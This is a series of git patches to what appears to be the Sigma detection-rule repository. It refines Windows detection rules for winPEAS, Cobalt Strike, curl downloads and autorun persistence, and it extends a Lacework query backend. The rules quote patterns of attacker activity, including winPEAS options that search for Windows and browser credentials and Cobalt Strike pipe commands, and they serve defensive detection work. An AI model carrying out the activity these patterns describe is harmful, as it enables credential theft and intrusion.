19 Sep 2022 23:23:28 +0200 Subject: [PATCH 066/120] Update proc_creation_win_winpeas_tool.yml --- .../proc_creation_win_winpeas_tool.yml | 10 +++++----- 1 file changed, 5 insertions(+), 5 deletions(-) diff --git a/rules/windows/process_creation/proc_creation_win_winpeas_tool.yml b/rules/windows/process_creation/proc_creation_win_winpeas_tool.yml index d591a8b10..ee5604ae5 100644 --- a/rules/windows/process_creation/proc_creation_win_winpeas_tool.yml +++ b/rules/windows/process_creation/proc_creation_win_winpeas_tool.yml @@ -17,16 +17,16 @@ logsource: product: windows detection: winpeas_basic: - - Image|endswith: + Image|endswith: - '\winPEASany.exe' - '\winPEASany_ofs.exe' - '\winPEASx64.exe' - '\winPEASx64_ofs.exe' - '\winPEASx86.exe' - '\winPEASx86_ofs.exe' - - OriginalFileName: 'winPEAS.exe' # always the same + OriginalFileName: 'winPEAS.exe' # always the same winpeas_option: - - CommandLine|contains: + CommandLine|contains: - 'systeminfo' # Search system information - 'userinfo' # Search user information - 'processinfo' # Search processes information @@ -39,8 +39,8 @@ detection: - 'fileanalysis' # Search specific files that can contains credentials and for regexes inside files - 'eventsinfo' # Display interesting events information filter_sysinfo: - - Image|endswith: '\systeminfo.exe' # due to option "systeminfo" via winPEAS - - OriginalFileName: 'sysinfo.exe' + Image|endswith: '\systeminfo.exe' # due to option "systeminfo" via winPEAS + OriginalFileName: 'sysinfo.exe' condition: 1 of winpeas_* and not filter_sysinfo fields: - Image From 137653f08a89aa27893476562ccc585b2463703a Mon Sep 17 00:00:00 2001 From: gs3cl <89155053+gs3cl@users.noreply.github.com> Date: Tue, 20 Sep 2022 11:04:12 +0200 Subject: [PATCH 067/120] fix format and delete 'OriginalFileName' --- .../proc_creation_win_winpeas_tool.yml | 14 ++++++-------- 1 file changed, 6 insertions(+), 8 deletions(-) diff --git a/rules/windows/process_creation/proc_creation_win_winpeas_tool.yml b/rules/windows/process_creation/proc_creation_win_winpeas_tool.yml index ee5604ae5..9696b83b3 100644 --- a/rules/windows/process_creation/proc_creation_win_winpeas_tool.yml +++ b/rules/windows/process_creation/proc_creation_win_winpeas_tool.yml @@ -5,8 +5,8 @@ description: WinPEAS is a script that search for possible paths to escalate priv author: Georg Lauenstein date: 2022/09/19 references: - - https://github.com/carlospolop/PEASS-ng - - https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation + - https://github.com/carlospolop/PEASS-ng + - https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation tags: - attack.privilege_escalation - attack.t1082 @@ -17,16 +17,15 @@ logsource: product: windows detection: winpeas_basic: - Image|endswith: + Image|endswith: - '\winPEASany.exe' - '\winPEASany_ofs.exe' - '\winPEASx64.exe' - '\winPEASx64_ofs.exe' - '\winPEASx86.exe' - '\winPEASx86_ofs.exe' - OriginalFileName: 'winPEAS.exe' # always the same winpeas_option: - CommandLine|contains: + CommandLine|contains: - 'systeminfo' # Search system information - 'userinfo' # Search user information - 'processinfo' # Search processes information @@ -39,8 +38,7 @@ detection: - 'fileanalysis' # Search specific files that can contains credentials and for regexes inside files - 'eventsinfo' # Display interesting events information filter_sysinfo: - Image|endswith: '\systeminfo.exe' # due to option "systeminfo" via winPEAS - OriginalFileName: 'sysinfo.exe' + Image|endswith: '\systeminfo.exe' # due to option "systeminfo" via winPEAS condition: 1 of winpeas_* and not filter_sysinfo fields: - Image @@ -49,5 +47,5 @@ fields: - ParentCommandLine - CurrentDirectory falsepositives: - - Should not be any as administrators do not use this tool + - Unlikely level: high From 2f7a54cc3176d0f9a0face8280509d0c65f9e044 Mon Sep 17 00:00:00 2001 From: Nasreddine Bencherchali <8741929+nasbench@users.noreply.github.com> Date: Tue, 20 Sep 2022 11:20:33 +0200 Subject: [PATCH 068/120] Fix FP --- ...vent_win_notepad_plus_plus_persistence.yml | 6 ++-- ...oad_side_load_from_non_system_location.yml | 3 ++ .../image_load_uipromptforcreds_dlls.yml | 17 +++++++---- ...ccess_win_direct_syscall_ntopenprocess.yml | 14 ++++++++- ...tion_win_cobaltstrike_process_patterns.yml | 29 +++++++++++-------- .../proc_creation_win_mstsc.yml | 6 ++-- ...ation_win_ntfs_short_name_path_use_cli.yml | 7 +++-- .../proc_creation_win_reg_add_run_key.yml | 6 ++-- .../proc_creation_win_susp_curl_download.yml | 13 +++++++-- ...susp_direct_asep_reg_keys_modification.yml | 1 + ...ation_win_susp_explorer_break_proctree.yml | 11 +++++-- .../proc_creation_win_susp_image_missing.yml | 4 ++- .../proc_creation_win_susp_non_exe_image.yml | 3 +- ...proc_creation_win_susp_squirrel_lolbin.yml | 5 +++- .../proc_creation_win_system_exe_anomaly.yml | 6 ++-- ...ion_win_windows_terminal_susp_children.yml | 4 +++ .../registry_event_runonce_persistence.yml | 2 +- 17 files changed, 98 insertions(+), 39 deletions(-) diff --git a/rules/windows/file_event/file_event_win_notepad_plus_plus_persistence.yml b/rules/windows/file_event/file_event_win_notepad_plus_plus_persistence.yml index 96e397ca5..d684b222a 100644 --- a/rules/windows/file_event/file_event_win_notepad_plus_plus_persistence.yml +++ b/rules/windows/file_event/file_event_win_notepad_plus_plus_persistence.yml @@ -6,7 +6,7 @@ author: Nasreddine Bencherchali references: - https://pentestlab.blog/2022/02/14/persistence-notepad-plugins/ date: 2022/06/10 -modified: 2022/06/21 +modified: 2022/09/20 logsource: product: windows category: file_event @@ -20,7 +20,9 @@ detection: # This filter is for Sigma dataset you could remove it or change when using the rule in your own env Image|startswith: 'C:\Users\' Image|contains: '\AppData\Local\Temp\' - Image|endswith: '\target.exe' + Image|endswith: + - '\target.exe' + - 'Installer.x64.exe' condition: selection and not 1 of filter* falsepositives: - Possible FPs during first installation of Notepad++ diff --git a/rules/windows/image_load/image_load_side_load_from_non_system_location.yml b/rules/windows/image_load/image_load_side_load_from_non_system_location.yml index acbbd1f87..de8fc8740 100644 --- a/rules/windows/image_load/image_load_side_load_from_non_system_location.yml +++ b/rules/windows/image_load/image_load_side_load_from_non_system_location.yml @@ -421,6 +421,9 @@ detection: filter_appvpolicy: ImageLoaded: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVPolicy.dll Image: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe + filter_dell: + Image: 'C:\Windows\System32\backgroundTaskHost.exe' + ImageLoaded|startswith: 'C:\Program Files\WindowsApps\DellInc.DellSupportAssistforPCs' condition: selection and not 1 of filter_* falsepositives: - Legitimate applications loading their own versions of the DLLs mentioned in this rule diff --git a/rules/windows/image_load/image_load_uipromptforcreds_dlls.yml b/rules/windows/image_load/image_load_uipromptforcreds_dlls.yml index e82154a0b..a9e409fd4 100644 --- a/rules/windows/image_load/image_load_uipromptforcreds_dlls.yml +++ b/rules/windows/image_load/image_load_uipromptforcreds_dlls.yml @@ -3,7 +3,7 @@ id: 9ae01559-cf7e-4f8e-8e14-4c290a1b4784 description: Detects potential use of UIPromptForCredentials functions by looking for some of the DLLs needed for it. status: experimental date: 2020/10/20 -modified: 2022/08/13 +modified: 2022/09/20 author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) tags: - attack.credential_access @@ -27,18 +27,23 @@ detection: filter_start: Image|startswith: - 'C:\Windows\System32\' - - 'C:\Windows\explorer.exe' + - 'C:\Windows\SysWOW64\' - 'C:\Program Files\' - 'C:\Program Files (x86)\' filter_end: Image|endswith: '\opera_autoupdate.exe' filter_full: - Image: 'C:\Windows\ImmersiveControlPanel\SystemSettings.exe' + Image: + - 'C:\Windows\ImmersiveControlPanel\SystemSettings.exe' + - 'C:\Windows\explorer.exe' filter_user: Image|startswith: 'C:\Users\' - Image|endswith: '\AppData\Roaming\Spotify\Spotify.exe' - filter_path: - Image|contains: '\Local\Microsoft\OneDrive\' + Image|endswith: + - '\AppData\Roaming\Spotify\Spotify.exe' + - '\AppData\Local\Microsoft\Teams\current\Teams.exe' + filter_contains: + Image|startswith: 'C:\Users\' + Image|contains: '\AppData\Local\Microsoft\OneDrive\' condition: selection and not 1 of filter_* falsepositives: - Other legitimate processes loading those DLLs in your environment. diff --git a/rules/windows/process_access/proc_access_win_direct_syscall_ntopenprocess.yml b/rules/windows/process_access/proc_access_win_direct_syscall_ntopenprocess.yml index e1587a4f6..c0a3ec60a 100755 --- a/rules/windows/process_access/proc_access_win_direct_syscall_ntopenprocess.yml +++ b/rules/windows/process_access/proc_access_win_direct_syscall_ntopenprocess.yml @@ -6,7 +6,7 @@ references: status: experimental author: Christian Burkard, Tim Shelton date: 2021/07/28 -modified: 2022/09/18 +modified: 2022/09/20 logsource: category: process_access product: windows @@ -32,6 +32,18 @@ detection: falsepositive6: TargetImage|endswith: 'C:\Program Files\Mozilla Firefox\firefox.exe' SourceImage|endswith: 'C:\Program Files\Mozilla Firefox\firefox.exe' + falsepositive7: # VsCode + TargetImage|endswith: '\AppData\Local\Programs\Microsoft VS Code\Code.exe' + SourceImage|endswith: '\AppData\Local\Programs\Microsoft VS Code\Code.exe' + falsepositive8: # Google Chrome + TargetImage|endswith: 'C:\Program Files\Google\Chrome\Application\chrome.exe' + SourceImage|endswith: 'C:\Program Files\Google\Chrome\Application\chrome.exe' + falsepositive9: # Google Chrome Update + TargetImage|endswith: 'C:\Program Files (x86)\Google\Update\GoogleUpdate.exe' + SourceImage|endswith: 'C:\Program Files (x86)\Google\Update\GoogleUpdate.exe' + falsepositive10: # MS Teams + TargetImage|endswith: '\AppData\Local\Microsoft\Teams\current\Teams.exe' + SourceImage|endswith: '\AppData\Local\Microsoft\Teams\current\Teams.exe' falsepositive_kerneltrace_edge: # Cases in which the CallTrace is just e.g. 'UNKNOWN(19290435374)' from Microsoft-Windows-Kernel-Audit-API-Calls provider Provider_Name: 'Microsoft-Windows-Kernel-Audit-API-Calls' condition: selection and not 1 of falsepositive* diff --git a/rules/windows/process_creation/proc_creation_win_cobaltstrike_process_patterns.yml b/rules/windows/process_creation/proc_creation_win_cobaltstrike_process_patterns.yml index 851989769..f4328767e 100644 --- a/rules/windows/process_creation/proc_creation_win_cobaltstrike_process_patterns.yml +++ b/rules/windows/process_creation/proc_creation_win_cobaltstrike_process_patterns.yml @@ -7,34 +7,39 @@ references: - https://hausec.com/2021/07/26/cobalt-strike-and-tradecraft/ - https://thedfirreport.com/2021/08/29/cobalt-strike-a-defenders-guide/ date: 2021/07/27 -modified: 2022/03/05 +modified: 2022/09/20 tags: - attack.execution - - attack.t1059 + - attack.t1059 logsource: category: process_creation product: windows detection: - selection1: + selection1: CommandLine|contains: '\cmd.exe /C whoami' ParentImage|startswith: 'C:\Temp' selection2: - CommandLine|contains: 'conhost.exe 0xffffffff -ForceV1' - ParentCommandLine|contains: - - '/C whoami' - - 'cmd.exe /C echo' - - ' > \\\\.\\pipe' - selection3: - CommandLine|contains: + CommandLine|contains: - 'cmd.exe /c echo' - '> \\\\.\\pipe' - '\whoami.exe' ParentImage|endswith: '\dllhost.exe' - selection4: + selection3: Image|endswith: '\cmd.exe' ParentImage|endswith: '\runonce.exe' ParentCommandLine|endswith: '\runonce.exe' - condition: 1 of selection* + selection_special1: + CommandLine|contains: 'conhost.exe 0xffffffff -ForceV1' + ParentCommandLine|contains: + - '/C whoami' + - 'cmd.exe /C echo' + - ' > \\\\.\\pipe' + filter_special1: + # Internet Download Manager - Chrome Extension + ParentCommandLine|contains: + - 'C:\Program Files (x86)\Internet Download Manager\IDMMsgHost.exe' + - 'chrome-extension://' + condition: 1 of selection* and (selection_special1 and not filter_special1) falsepositives: - Other programs that cause these patterns (please report) level: high diff --git a/rules/windows/process_creation/proc_creation_win_mstsc.yml b/rules/windows/process_creation/proc_creation_win_mstsc.yml index e7200ba8f..20df29533 100644 --- a/rules/windows/process_creation/proc_creation_win_mstsc.yml +++ b/rules/windows/process_creation/proc_creation_win_mstsc.yml @@ -7,7 +7,7 @@ references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1021.001/T1021.001.md#t1021001---remote-desktop-protocol - https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/mstsc date: 2022/01/07 -modified: 2022/06/12 +modified: 2022/09/20 logsource: category: process_creation product: windows @@ -25,7 +25,9 @@ detection: - ' /g' - ' /u' - ' /p' - condition: all of selection_mstsc* or all of selection_cmdkey* + filter_mstsc_1: + ParentImage: 'C:\Windows\System32\lxss\wslhost.exe' + condition: all of selection_mstsc* and not 1 of filter_mstsc_* or all of selection_cmdkey* falsepositives: - Unknown level: medium diff --git a/rules/windows/process_creation/proc_creation_win_ntfs_short_name_path_use_cli.yml b/rules/windows/process_creation/proc_creation_win_ntfs_short_name_path_use_cli.yml index 6fe080f91..e09469b62 100644 --- a/rules/windows/process_creation/proc_creation_win_ntfs_short_name_path_use_cli.yml +++ b/rules/windows/process_creation/proc_creation_win_ntfs_short_name_path_use_cli.yml @@ -11,7 +11,7 @@ references: - https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-2000-server/cc959352(v=technet.10)?redirectedfrom=MSDN - https://twitter.com/frack113/status/1555830623633375232 date: 2022/08/07 -modified: 2022/09/12 +modified: 2022/09/20 logsource: category: process_creation product: windows @@ -22,8 +22,9 @@ detection: - '~2\' filter: - ParentImage: - - C:\Windows\System32\Dism.exe - - C:\Windows\System32\cleanmgr.exe + - 'C:\Windows\System32\Dism.exe' + - 'C:\Windows\System32\cleanmgr.exe' + - 'C:\Program Files\GPSoftware\Directory Opus\dopus.exe' - ParentImage|endswith: - '\WebEx\WebexHost.exe' - '\thor\thor64.exe' diff --git a/rules/windows/process_creation/proc_creation_win_reg_add_run_key.yml b/rules/windows/process_creation/proc_creation_win_reg_add_run_key.yml index ef9ededa7..ad770a245 100644 --- a/rules/windows/process_creation/proc_creation_win_reg_add_run_key.yml +++ b/rules/windows/process_creation/proc_creation_win_reg_add_run_key.yml @@ -12,13 +12,15 @@ logsource: product: windows detection: selection: - CommandLine|contains|all: + CommandLine|contains|all: - 'reg' - ' ADD ' - 'Software\Microsoft\Windows\CurrentVersion\Run' condition: selection falsepositives: - - Unknown + - Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reasons. + - Legitimate administrator sets up autorun keys for legitimate reasons. + - Discord level: medium tags: - attack.persistence diff --git a/rules/windows/process_creation/proc_creation_win_susp_curl_download.yml b/rules/windows/process_creation/proc_creation_win_susp_curl_download.yml index 5ca802523..67f7c265e 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_curl_download.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_curl_download.yml @@ -9,7 +9,7 @@ references: - https://github.com/pr0xylife/Qakbot/blob/4f0795d79dabee5bc9dd69f17a626b48852e7869/Qakbot_AA_23.06.2022.txt - https://www.volexity.com/blog/2022/07/28/sharptongue-deploys-clever-mail-stealing-browser-extension-sharpext/ date: 2020/07/03 -modified: 2022/09/13 +modified: 2022/09/20 logsource: category: process_creation product: windows @@ -41,7 +41,16 @@ detection: - ' -O' # covers the alias for --remote-name and --output - '--remote-name' - '--output' - condition: selection_curl and 1 of selection_susp* + filter_git_windows: + ParentImage: 'C:\Program Files\Git\usr\bin\sh.exe' + ParentCommandLine|contains|all: + - 'git-update-git-for-windows' + - '--quiet --gui' + Image: 'C:\Program Files\Git\mingw64\bin\curl.exe' + CommandLine|contains|all: + - '--silent --show-error --output ' + - 'gfw-httpget-' + condition: selection_curl and 1 of selection_susp* and not 1 of filter_* fields: - CommandLine - ParentCommandLine diff --git a/rules/windows/process_creation/proc_creation_win_susp_direct_asep_reg_keys_modification.yml b/rules/windows/process_creation/proc_creation_win_susp_direct_asep_reg_keys_modification.yml index 421e0f538..fa812d78b 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_direct_asep_reg_keys_modification.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_direct_asep_reg_keys_modification.yml @@ -29,6 +29,7 @@ fields: falsepositives: - Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reasons. - Legitimate administrator sets up autorun keys for legitimate reasons. + - Discord level: medium tags: - attack.persistence diff --git a/rules/windows/process_creation/proc_creation_win_susp_explorer_break_proctree.yml b/rules/windows/process_creation/proc_creation_win_susp_explorer_break_proctree.yml index 880093006..64bd7a5e7 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_explorer_break_proctree.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_explorer_break_proctree.yml @@ -2,21 +2,26 @@ title: Explorer Process Tree Break id: 949f1ffb-6e85-4f00-ae1e-c3c5b190d605 status: test description: Detects a command line process that uses explorer.exe to launch arbitrary commands or binaries, which is similar to cmd.exe /c, only it breaks the process tree and makes its parent a new instance of explorer spawning from "svchost" -author: Florian Roth, Nasreddine Bencherchali +author: 'Florian Roth, Nasreddine Bencherchali, @gott_cyber' references: - https://twitter.com/CyberRaiju/status/1273597319322058752 - https://twitter.com/bohops/status/1276357235954909188?s=12 - https://twitter.com/nas_bench/status/1535322450858233858 - https://securityboulevard.com/2019/09/deobfuscating-ostap-trickbots-34000-line-javascript-downloader/ date: 2019/06/29 -modified: 2022/06/14 +modified: 2022/09/20 logsource: category: process_creation product: windows detection: selection: # See CLSID_SeparateMultipleProcessExplorerHost in the registry for reference - CommandLine|contains: '/factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b}' + - CommandLine|contains: '/factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b}' # This will catch, the new explorer spawning which indicates a process/tree break. But you won't be able to catch the executing process. For that you need historical data + # There is exists almost infinite possibilities to spawn from explorer. The "/root" flag is just an example + # It's better to have the ability to look at the process tree and look for explorer processes with "weird" flags to be able to catch this technique. + - CommandLine|contains|all: + - 'explorer.exe' + - ' /root,' condition: selection falsepositives: - Unknown how many legitimate software products use that method diff --git a/rules/windows/process_creation/proc_creation_win_susp_image_missing.yml b/rules/windows/process_creation/proc_creation_win_susp_image_missing.yml index 05d19eed8..f01b13a1f 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_image_missing.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_image_missing.yml @@ -4,7 +4,7 @@ status: experimental description: Checks whether the image specified in a process creation event is not a full, absolute path (caused by process ghosting or other unorthodox methods to start a process) author: Max Altgelt date: 2021/12/09 -modified: 2022/03/08 +modified: 2022/09/20 references: - https://pentestlaboratories.com/2021/12/08/process-ghosting/ tags: @@ -25,9 +25,11 @@ detection: - Image: - 'Registry' - 'MemCompression' + - 'vmmem' - CommandLine: - 'Registry' - 'MemCompression' + - 'vmmem' condition: not image_absolute_path and not 1 of filter* falsepositives: - Unknown diff --git a/rules/windows/process_creation/proc_creation_win_susp_non_exe_image.yml b/rules/windows/process_creation/proc_creation_win_susp_non_exe_image.yml index d89582a80..e8b55f8fe 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_non_exe_image.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_non_exe_image.yml @@ -4,7 +4,7 @@ status: experimental description: Checks whether the image specified in a process creation event doesn't refer to an .exe file (caused by process ghosting or other unorthodox methods to start a process) author: Max Altgelt date: 2021/12/09 -modified: 2022/06/20 +modified: 2022/09/20 references: - https://pentestlaboratories.com/2021/12/08/process-ghosting/ tags: @@ -23,6 +23,7 @@ detection: Image: - 'Registry' - 'MemCompression' + - 'vmmem' filter_empty: Image: - '-' diff --git a/rules/windows/process_creation/proc_creation_win_susp_squirrel_lolbin.yml b/rules/windows/process_creation/proc_creation_win_susp_squirrel_lolbin.yml index 7912a646f..911c0d961 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_squirrel_lolbin.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_squirrel_lolbin.yml @@ -11,7 +11,7 @@ tags: - attack.t1218 author: Karneades / Markus Neis, Jonhnathan Ribeiro, oscd.community date: 2019/11/12 -modified: 2022/08/23 +modified: 2022/09/20 logsource: category: process_creation product: windows @@ -32,6 +32,9 @@ detection: - CommandLine|contains|all: - 'C:\Users\' - '\AppData\Local\GitHubDesktop\Update.exe --createShortcut GitHubDesktop.exe' + - CommandLine|contains|all: + - 'C:\Users\' + - '\AppData\Local\GitHubDesktop\Update.exe --processStartAndWait GitHubDesktop.exe' - CommandLine|contains|all: - 'C:\Users\' - '\AppData\Local\Microsoft\Teams\Update.exe" --processStart "Teams.exe"' diff --git a/rules/windows/process_creation/proc_creation_win_system_exe_anomaly.yml b/rules/windows/process_creation/proc_creation_win_system_exe_anomaly.yml index e9ec591cf..14d2cd03e 100644 --- a/rules/windows/process_creation/proc_creation_win_system_exe_anomaly.yml +++ b/rules/windows/process_creation/proc_creation_win_system_exe_anomaly.yml @@ -6,7 +6,7 @@ references: - https://twitter.com/GelosSnake/status/934900723426439170 author: Florian Roth, Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali date: 2017/11/27 -modified: 2022/09/07 +modified: 2022/09/20 tags: - attack.defense_evasion - attack.t1036 @@ -71,7 +71,9 @@ detection: - 'C:\Windows\WinSxS\' # - 'C:\avast! sandbox' - Image|contains: '\SystemRoot\System32\' - - Image: 'C:\Windows\explorer.exe' + - Image: + - 'C:\Windows\explorer.exe' + - 'C:\Program Files\PowerShell\7\pwsh.exe' condition: selection and not filter fields: - ComputerName diff --git a/rules/windows/process_creation/proc_creation_win_windows_terminal_susp_children.yml b/rules/windows/process_creation/proc_creation_win_windows_terminal_susp_children.yml index 38dea0b0b..92a7a55f9 100644 --- a/rules/windows/process_creation/proc_creation_win_windows_terminal_susp_children.yml +++ b/rules/windows/process_creation/proc_creation_win_windows_terminal_susp_children.yml @@ -47,6 +47,10 @@ detection: CommandLine|contains|all: - '\AppData\Local\Packages\Microsoft.WindowsTerminal_' - '\LocalState\settings.json' + filter_vsdevcmd: + CommandLine|contains|all: + - 'C:\Program Files\Microsoft Visual Studio\' + - '\Common7\Tools\VsDevCmd.bat' condition: all of selection_* and not 1 of filter_* falsepositives: - Other legitimate "Windows Terminal" profiles diff --git a/rules/windows/registry/registry_event/registry_event_runonce_persistence.yml b/rules/windows/registry/registry_event/registry_event_runonce_persistence.yml index a998c6b34..1fc7bde2f 100644 --- a/rules/windows/registry/registry_event/registry_event_runonce_persistence.yml +++ b/rules/windows/registry/registry_event/registry_event_runonce_persistence.yml @@ -17,7 +17,7 @@ detection: TargetObject|endswith: '\StubPath' filter_chrome: Details|startswith: '"C:\Program Files\Google\Chrome\Application\' - Details|endswith: '\Installer\chrmstp.exe" --configure-user-settings --verbose-logging --system-level' + Details|contains: '\Installer\chrmstp.exe" --configure-user-settings --verbose-logging --system-level' # In some cases the Details will contain an additional flag called "--channel=stable" at the end filter_edge: Details|startswith: - '"C:\Program Files (x86)\Microsoft\Edge\Application\' From cb09f9d522576dabfc2af60e4919bee331ce610b Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Tue, 20 Sep 2022 17:44:56 +0200 Subject: [PATCH 069/120] Update proc_creation_win_winpeas_tool.yml --- .../proc_creation_win_winpeas_tool.yml | 27 ++++++------------- 1 file changed, 8 insertions(+), 19 deletions(-) diff --git a/rules/windows/process_creation/proc_creation_win_winpeas_tool.yml b/rules/windows/process_creation/proc_creation_win_winpeas_tool.yml index 9696b83b3..0b34ea85c 100644 --- a/rules/windows/process_creation/proc_creation_win_winpeas_tool.yml +++ b/rules/windows/process_creation/proc_creation_win_winpeas_tool.yml @@ -16,7 +16,7 @@ logsource: category: process_creation product: windows detection: - winpeas_basic: + selection_basic: Image|endswith: - '\winPEASany.exe' - '\winPEASany_ofs.exe' @@ -24,28 +24,17 @@ detection: - '\winPEASx64_ofs.exe' - '\winPEASx86.exe' - '\winPEASx86_ofs.exe' - winpeas_option: - CommandLine|contains: - - 'systeminfo' # Search system information - - 'userinfo' # Search user information - - 'processinfo' # Search processes information + selection_pe: + OriginalFileName: 'winPEAS.exe' + selection_option: + - CommandLine|endswith: - 'serviceinfo' # Search services information - 'applicationsinfo' # Search installed applications information - - 'networkinfo' # Search network information - 'windowscreds' # Search windows credentials - 'browserinfo ' # Search browser information - - 'filesinfo ' # Search generic files that can contains credentials - 'fileanalysis' # Search specific files that can contains credentials and for regexes inside files - - 'eventsinfo' # Display interesting events information - filter_sysinfo: - Image|endswith: '\systeminfo.exe' # due to option "systeminfo" via winPEAS - condition: 1 of winpeas_* and not filter_sysinfo -fields: - - Image - - User - - CommandLine - - ParentCommandLine - - CurrentDirectory + - CommandLine|contains: '.exe browserinfo ' # Search browser information + condition: 1 of selection* falsepositives: - - Unlikely + - Other programs that use the same command line flags level: high From 83fbd7f258a315417f4418f0f07700cd4abcfa7c Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Tue, 20 Sep 2022 17:45:13 +0200 Subject: [PATCH 070/120] Update proc_creation_win_winpeas_tool.yml --- .../windows/process_creation/proc_creation_win_winpeas_tool.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/windows/process_creation/proc_creation_win_winpeas_tool.yml b/rules/windows/process_creation/proc_creation_win_winpeas_tool.yml index 0b34ea85c..917e8fdba 100644 --- a/rules/windows/process_creation/proc_creation_win_winpeas_tool.yml +++ b/rules/windows/process_creation/proc_creation_win_winpeas_tool.yml @@ -25,7 +25,7 @@ detection: - '\winPEASx86.exe' - '\winPEASx86_ofs.exe' selection_pe: - OriginalFileName: 'winPEAS.exe' + OriginalFileName: 'winPEAS.exe' selection_option: - CommandLine|endswith: - 'serviceinfo' # Search services information From ad6ddf5896d2032293e56d76a1e1821e9c6ae7b2 Mon Sep 17 00:00:00 2001 From: David Hazekamp Date: Tue, 20 Sep 2022 13:47:17 -0500 Subject: [PATCH 071/120] feat(backend): add support for linux.network_connection Also remove evaluatorId --- tools/sigma/backends/lacework.py | 104 ++++++++++++++++++------------- 1 file changed, 61 insertions(+), 43 deletions(-) diff --git a/tools/sigma/backends/lacework.py b/tools/sigma/backends/lacework.py index f3c5eb870..df4e60f0c 100644 --- a/tools/sigma/backends/lacework.py +++ b/tools/sigma/backends/lacework.py @@ -33,10 +33,9 @@ from sigma.parser.modifiers.base import SigmaTypeModifier LACEWORK_CONFIG = yaml.load( textwrap.dedent(''' --- - version: 0.3 + version: 0.4 services: cloudtrail: - evaluatorId: Cloudtrail source: CloudTrailRawEvents fieldMap: - sigmaField: eventName @@ -67,8 +66,8 @@ LACEWORK_CONFIG = yaml.load( alertProfile: LW_CloudTrail_Alerts product.categories: linux.file_create: - evaluatorId: - source: LW_HE_FILES + sources: + - LW_HE_FILES conditions: # evaluated hourly and file create time within the last hour - and diff_minutes(FILE_CREATED_TIME, current_timestamp_sec()::timestamp) <= 60 @@ -87,9 +86,40 @@ LACEWORK_CONFIG = yaml.load( - OWNER_USERNAME - FILE_CREATED_TIME alertProfile: LW_HE_FILES_DEFAULT_PROFILE.HE_File_NewViolation + linux.network_connection: + sources: + - LW_HA_CONNECTION_SUMMARY as HACM + - array_to_rows(ENDPOINT_DETAILS) as (EP_PA) + fieldMap: + - sigmaField: Image + laceworkField: EXE_PATH + matchType: exact + action: selfjoin + selfJoinFilter: HACM.SRC_ENTITY_TYPE = 'Process' AND (HACM.SRC_ENTITY_ID:mid::NUMBER, HACM.SRC_ENTITY_ID:pid_hash::NUMBER) IN { source { LW_HE_PROCESSES AS HEP } filter { EXE_PATH like '%/bin/bash' } return { HEP.MID, HEP.PID_HASH }} + - sigmaField: DestinationIp + laceworkField: EP_PA:dst_ip_addr + matchType: exact + - sigmaField: DestinationHostname + laceworkField: + matchType: exact + action: raise + returns: + - HACM.BATCH_END_TIME + - HACM.BATCH_START_TIME + - HACM.DST_ENTITY_ID + - HACM.DST_ENTITY_TYPE + - HACM.DST_IN_BYTES + - HACM.DST_OUT_BYTES + - HACM.ENDPOINT_DETAILS + - HACM.NUM_CONNS + - HACM.SRC_ENTITY_ID + - HACM.SRC_ENTITY_TYPE + - HACM.SRC_IN_BYTES + - HACM.SRC_OUT_BYTES + alertProfile: LW_HA_CONNECTION_SUMMARY_DEFAULT_PROFILE.HA_Connection_Violation linux.process_creation: - evaluatorId: - source: LW_HE_PROCESSES + sources: + - LW_HE_PROCESSES conditions: # evaluated hourly and file create time within the last hour - and diff_minutes(PROCESS_START_TIME, current_timestamp_sec()::timestamp) <= 60 @@ -489,22 +519,18 @@ class LaceworkQuery: self.logsource_config = self.get_logsource_config( config, self.logsource_type, self.logsource_name) - # 3. Get Evaluator ID - self.evaluator_id = self.get_evaluator_id( - self.logsource_name, self.logsource_config) - - # 4. Get Query ID + # 3. Get Query ID self.title, self.query_id = self.get_query_id(rule) - # 5. Get Query Source - self.query_source = self.get_query_source( + # 4. Get Query Source + self.query_sources = self.get_query_sources( self.logsource_name, self.logsource_config) - # 6. Get Query Returns + # 5. Get Query Returns self.returns = self.get_query_returns( self.logsource_name, self.logsource_config) - # 7. Get Query Text + # 6. Get Query Text self.query_text = self.get_query_text(backend, conditions) def get_query_text(self, backend, rule_conditions): @@ -539,8 +565,9 @@ class LaceworkQuery: ' {source}\n' ' }}' ) + return source_block_template.format( - source=self.query_source + source=',\n '.join(self.query_sources) ) def get_query_return_block(self): @@ -555,7 +582,6 @@ class LaceworkQuery: def __iter__(self): for key, attr in { - 'evaluatorId': 'evaluator_id', 'queryId': 'query_id', 'queryText': 'query_text' }.items(): @@ -623,12 +649,6 @@ class LaceworkQuery: return logsource_config - @staticmethod - def get_evaluator_id(logsource_name, logsource_config): - # 3. validate service has an evaluatorId mapping - evaluator_id = safe_get(logsource_config, 'evaluatorId', str) - return evaluator_id if evaluator_id else None - @staticmethod def get_query_id(rule): title = safe_get(rule, 'title', str) or 'Unknown' @@ -638,15 +658,18 @@ class LaceworkQuery: return title, query_id @staticmethod - def get_query_source(logsource_name, logsource_config): + def get_query_sources(logsource_name, logsource_config) -> list[str]: # 4. validate service has a source mapping source = safe_get(logsource_config, 'source', 